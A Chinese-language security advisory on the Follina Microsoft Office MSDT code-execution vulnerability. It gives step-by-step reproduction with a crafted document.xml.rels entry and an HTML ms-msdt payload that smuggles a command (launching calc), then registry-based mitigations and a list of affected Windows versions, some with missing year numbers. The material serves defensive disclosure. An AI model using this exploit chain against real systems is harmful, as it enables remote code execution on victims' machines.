0x01 Microsoft Office
Microsoft Office是由Microsoft(微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint等。
0x02 漏洞简介
该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件,该服务器使用 ms-msdt MSProtocol URI 方案加载代码并执行 PowerShell,禁用宏,仍能通过MSDT功能执行代码(恶意 Word 文档通常用于通过宏执行代码)。Microsoft Defender 当前无法阻止执行。受保护的视图启动无需打开文档即可运行。
0x03 漏洞复现
步骤:
1、 新建一个word 文档,在里面随便输入东西
2、 将 word 文档后缀更改为 zip
3、 将 zip 包解压打开,编辑文件夹下的 word 目录下的_rels 下的document.xml.rels
4 、 按照格式加入
<Relationship Id="rId1337" Type="/officeDocument//relationships/oleObje ct" Target="mhtml:http://localhost:80/exploit.html!x-usc:http://localhost:80/exploit.html" TargetMode="External"/>
5、 然后将文件夹打包成 zip,再改后缀为docx
6、 建一个文件夹作为web 站点目录,新建html 文件添加
<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=?IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\\\localhost\\c$\\windows\\system32\\calc)/.exe\"";</script>
7、 点开改好后的word 文档即可
目前发现的POC(弹出计算器)
GitHub - chvancooten/follina.py: POC to replicate the full 'Follina' Office RCE vulnerability for testing purposesPOC to replicate the full 'Follina' Office RCE vulnerability for testing purposes - GitHub - chvancooten/follina.py: POC to replicate the full 'Follina' Office RCE vulnerability for testing purposes/chvancooten/follina.py
GitHub - onecloudemoji/CVE--30190: CVE--30190 Follina POCCVE--30190 Follina POC. Contribute to onecloudemoji/CVE--30190 development by creating an account on GitHub./onecloudemoji/CVE--30190
作者给出的几种方法
0x04 漏洞评定
公开程度:已发现在野利用
利用条件:需要打开或点击特定文件
漏洞危害:高危 任意代码执行
0x05 修复方案
官方修复方案:
目前微软暂未针对此漏洞发布安全补丁,提供了临时修复措施进行防护:
禁用MSDT URL协议
1、以管理员身份运行命令提示符。
2、备份注册表项后,执行命令
reg export HKEY_CLASSES_ROOT\ms-msdt filename
3、再执行命令
reg delete HKEY_CLASSES_ROOT\ms-msdt /f
撤销该禁用:
1、以管理员身份运行命令提示符。
2、备份注册表项后,执行命令
reg import filename
官方参考链接:
https://msrc-//05/30/guidance-for-cve--30190-microsoft-support-diagnostic-tool-vulnerability/
Microsoft Defender在1.367.719.0及以上版本支持此漏洞的检测和防护,Microsoft Defender for Endpoint 已为用户提供检测和警报;Microsoft365 Defender门户中的以下警报标题可以提示网络上的威胁活动:Office 应用程序的可疑行为、Msdt.exe 的可疑行为。
0x05 影响范围
影响版本:
Windows Server R2 (Server Core installation)
Windows Server R2
Windows Server (Server Core installation)
Windows Server
Windows Server R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server R2 for x64-based Systems Service Pack 1
Windows Server for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server for x64-based Systems Service Pack 2
Windows Server for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server (Server Core installation)
Windows Server
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server Azure Edition Core Hotpatch
Windows Server (Server Core installation)
Windows Server
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows Server (Server Core installation)
Windows Server
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
其他修复方案:
1、关闭资源管理器的预览窗格,不轻易打开陌生链接或下载来历不明的文档;
2、如果您使用Microsoft Defender的 Attack Surface Reduction(ASR)规则,则可在Block模式下激活“阻止所有Office应用程序创建子进程”规则。若您还没有使用ASR规则,可先在Audit模式下运行规则,观察结果以确保不会对系统造成不利影响;
3、通过创建ASL规则防止Office产生子进程:
![[CVE--30190]MICROSOFT OFFICE MSDT代码执行漏洞](https://1500zi.500zi.com/uploadfile/img/15/178/befae2387e336749564c5abf0016b04f.jpg)
